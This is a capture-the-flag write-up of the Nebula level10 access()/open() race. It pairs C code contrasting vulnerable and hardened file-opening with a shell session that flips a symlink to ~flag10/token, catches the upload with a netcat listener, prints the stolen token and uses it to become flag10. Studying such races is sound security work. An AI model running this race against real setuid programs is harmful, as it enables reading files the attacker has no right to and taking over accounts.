The setuid binary at /home/flag10/flag10 will upload any file given to it, as long as that file passes the check made with the access() system call.

Source code:
This program's purpose is to send a file to the specified host, if you have read access to the file. The access check, however, is implemented poorly. The access(2) man page warns that a race condition exists when exactly this check-then-open pattern is used:
Warning: Using access() to check if a user is authorized to, for example, open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call open(2).)

We need to read ~flag10/token. To exploit the flag10 binary we make it check the access of a symbolic link that is continuously flipped between a legitimate, readable file and ~flag10/token, hoping that the link changes from the legitimate file to the actual token file in the window between the access() system call and the open() system call.
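The two halves of the man page warning side by side, as an added example (my own code, not the level's source): the check-then-open pattern the binary uses, the effective-UID switch the man page recommends instead, and a small deterministic harness that shows why the access() result is meaningless. The harness builds its own fixture (a "public" file, a "secret" file and a "token" symlink in a fresh temp directory; all names are this example's) and reports whether the inode that got opened is the inode that was checked. The privilege drop in open_as_real_user() only changes anything when the process is setuid; in an ordinary process it is a plain open().

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/* VULNERABLE: the check-then-open pattern. access() and open() each resolve
 * the path on their own, so a symlink swapped between the two calls is
 * checked as one file and opened as another (time-of-check/time-of-use). */
int open_check_then_open(const char *path)
{
    if (access(path, R_OK) != 0)
        return -1;                    /* "You don't have access to ..." */
    return open(path, O_RDONLY);      /* second lookup: this is the window */
}

/* HARDENED: the alternative the access(2) man page recommends. Run as the
 * caller's real UID while opening, so the kernel applies the caller's own
 * permissions inside open() itself: one lookup, one check, no window.
 * In a non-setuid process euid == ruid and this reduces to open(). */
int open_as_real_user(const char *path)
{
    uid_t euid = geteuid(), ruid = getuid();
    if (euid != ruid && seteuid(ruid) != 0)
        return -1;
    int fd = open(path, O_RDONLY | O_CLOEXEC);
    int saved_errno = errno;
    if (euid != ruid && seteuid(euid) != 0) {   /* restore privilege */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* --- Constructed fixture for the demonstration (names are this example's). --- */
static char g_dir[] = "/tmp/toctou-demo-XXXXXX";   /* filled in by mkdtemp */
static char g_link[256], g_public[256], g_secret[256];

static int write_file(const char *path, const char *text)
{
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Creates "public" and "secret" plus a symlink "token" -> public. */
int make_fixture(void)
{
    if (!mkdtemp(g_dir)) return -1;
    snprintf(g_link,   sizeof g_link,   "%s/token",  g_dir);
    snprintf(g_public, sizeof g_public, "%s/public", g_dir);
    snprintf(g_secret, sizeof g_secret, "%s/secret", g_dir);
    if (write_file(g_public, "public\n") != 0) return -1;
    if (write_file(g_secret, "secret\n") != 0) return -1;
    return symlink(g_public, g_link);
}

/* One deterministic flip of the link, standing in for the ln -sf loop. */
void repoint_link_to_secret(void)
{
    unlink(g_link);
    symlink(g_secret, g_link);
}

/* Performs the access() check, lets `between` act, then opens the path.
 * Returns 1 if the inode opened is not the inode that was checked, 0 if
 * they match, -1 on error. A mismatch here is the bug made visible. */
int checked_and_opened_differ(const char *path, void (*between)(void))
{
    struct stat checked, opened;
    if (access(path, R_OK) != 0 || stat(path, &checked) != 0)
        return -1;
    if (between) between();
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    int rc = fstat(fd, &opened);
    close(fd);
    if (rc != 0) return -1;
    return checked.st_ino != opened.st_ino;
}

int main(void)
{
    if (make_fixture() != 0) { perror("fixture"); return 1; }
    printf("no swap between check and open: differ=%d\n",
           checked_and_opened_differ(g_link, NULL));
    printf("link swapped between check and open: differ=%d\n",
           checked_and_opened_differ(g_link, repoint_link_to_secret));
    return 0;
}
```

The harness proves the point without any timing luck: with nothing happening between the two calls the inodes match, and with a single flip in between they do not. The fix is not a faster check but removing the second lookup, which is what dropping to the real UID before open() achieves.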
level10@nebula:~$ while true; do ln -sf /dev/null token; ln -sf ~flag10/token token; done &
[1] 11039
level10@nebula:~$ nc.traditional -l -p 18211 > loot & # traditional netcat FTW!
[2] 14719
level10@nebula:~$ ~flag10/flag10 token 127.0.0.1
You don't have access to token
level10@nebula:~$ ~flag10/flag10 token 127.0.0.1
You don't have access to token
level10@nebula:~$ ~flag10/flag10 token 127.0.0.1
Connecting to 127.0.0.1:18211 .. Connected!
Sending file .. wrote file!
[2]+  Done                    nc.traditional -l -p 18211 > loot
level10@nebula:~$ kill -9 11039 # cleanup
level10@nebula:~$ cat fl
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
[1]+  Killed                  while true; do ln -sf /dev/null token; ln -sf ~flag10/token token; done

Now go ahead and get the flag :)
level10@nebula:~$ su flag10 -c getflag
Password:
You have successfully executed getflag on a target account